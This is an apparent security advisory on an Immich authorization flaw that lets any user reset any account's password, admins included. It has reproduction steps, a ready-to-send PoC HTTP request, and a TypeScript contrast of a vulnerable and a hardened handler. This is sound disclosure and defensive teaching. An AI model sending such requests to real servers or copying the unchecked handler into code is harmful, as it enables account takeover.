API Security Blog

Full Account Takeover via Improper Authorization

# Description
Immich does not check for admin privileges when setting account passwords. This allows any user to set the password for any account, thus allowing privilege escalation by admin account takeover.

# Proof of Concept

Steps to reproduce:

1. Log in to a non-admin account.
2. Obtain all user information with a GET request to `/api/user?isAll=false` (this endpoint is required for the `Shared Albums` feature). Admins can be identified by the `isAdmin` flag.
3. Set the password of any account with the PoC request below (adjust the user id accordingly). This is where the authorization check is missing.
4. Observe that the target account's password has been changed. This also works for admin accounts.

### PoC Request
```http
PUT /api/user HTTP/1.1
Host: 10.0.2.15:2283
[…]
Cookie: immich_access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiJjNWRhYTE0MC1jYTEzLTQxOGYtYjFkMy0wNzZjNTRhZTgyYTAiLCJlbWFpbCI6Im5vdGFuYWRtaW5AdGVzdC5jb20iLCJpYXQiOjE2NjMyODEzMzcsImV4cCI6MTY2Mzg4NjEzN30.fbGB6YQ04F9JFs8qY4CtLeeah4L79vAh6QlZYJTWFDU; immich_is_authenticated=true

{"id":"ed0398b5-a64a-4dd5-af58-8a372bdee6e5","password":"password","shouldChangePassword":false}
```
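The root cause above is an update handler that trusts the `id` in the request body without comparing it to the caller's session identity. The following is an added example, not Immich's own code, showing that handler shape with the missing check beside the corrected one. All names (`AuthUser`, `UpdateUserDto`, `makeStore`, `updateUserHardened`, the sample users) are hypothetical stand-ins for the real service and database.

```typescript
// Added example, not Immich's code: an "update user" handler in the shape the
// advisory describes, with the missing ownership/admin check beside the
// corrected one. Every name here is hypothetical and stands in for the real
// NestJS service and database layer.

interface AuthUser {
  id: string;       // identity taken from the session token, not the body
  isAdmin: boolean;
}

interface UpdateUserDto {
  id: string;       // user-controlled: comes straight from the JSON body
  password?: string;
  shouldChangePassword?: boolean;
}

interface StoredUser {
  id: string;
  email: string;
  isAdmin: boolean;
  passwordHash: string;
  shouldChangePassword: boolean;
}

class ForbiddenError extends Error {
  constructor(message: string) {
    super(message);
    this.name = 'ForbiddenError';
  }
}

// Stand-in for a real password hash (use bcrypt or argon2 in production).
function hashPassword(pw: string): string {
  return `hash(${pw})`;
}

// Constructed in-memory user table: one admin, one ordinary user.
function makeStore(): Map<string, StoredUser> {
  return new Map<string, StoredUser>([
    ['admin-0001', { id: 'admin-0001', email: 'admin@example.test', isAdmin: true,
      passwordHash: hashPassword('admin-secret'), shouldChangePassword: false }],
    ['user-0002', { id: 'user-0002', email: 'notanadmin@example.test', isAdmin: false,
      passwordHash: hashPassword('user-secret'), shouldChangePassword: false }],
  ]);
}

// Shared persistence step: applies the DTO to the stored record.
function applyUpdate(store: Map<string, StoredUser>, dto: UpdateUserDto): StoredUser {
  const target = store.get(dto.id);
  if (!target) throw new Error(`no such user: ${dto.id}`);
  if (dto.password !== undefined) target.passwordHash = hashPassword(dto.password);
  if (dto.shouldChangePassword !== undefined) target.shouldChangePassword = dto.shouldChangePassword;
  return target;
}

// Vulnerable shape: the caller is authenticated, but dto.id is trusted as-is,
// so any logged-in user can rewrite any record, admins included.
function updateUserVulnerable(store: Map<string, StoredUser>, _caller: AuthUser, dto: UpdateUserDto): StoredUser {
  return applyUpdate(store, dto);
}

// Hardened shape: a non-admin may only modify their own record. The comparison
// uses the identity from the session, never a value supplied in the body.
function updateUserHardened(store: Map<string, StoredUser>, caller: AuthUser, dto: UpdateUserDto): StoredUser {
  if (dto.id !== caller.id && !caller.isAdmin) {
    // Log-worthy event: a non-admin attempted a cross-account write.
    throw new ForbiddenError(`user ${caller.id} may not modify user ${dto.id}`);
  }
  return applyUpdate(store, dto);
}

// Returns true only when the handler refused the update with ForbiddenError.
function isRejected(fn: () => unknown): boolean {
  try {
    fn();
    return false;
  } catch (e) {
    return e instanceof Error && e.name === 'ForbiddenError';
  }
}

// Usage: a non-admin session sending the advisory's request body against the admin id.
const nonAdmin: AuthUser = { id: 'user-0002', isAdmin: false };
const attempt: UpdateUserDto = { id: 'admin-0001', password: 'password', shouldChangePassword: false };
const vulnerableStore = makeStore();
updateUserVulnerable(vulnerableStore, nonAdmin, attempt); // silently rewrites the admin's password
const hardenedStore = makeStore();
console.log('hardened handler rejects:', isRejected(() => updateUserHardened(hardenedStore, nonAdmin, attempt)));
```

The essential property is that the ownership decision is made against the session identity, not against anything the client can put in the body; a rejected cross-account write is also a useful signal to log, since a legitimate client has no reason to send one.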
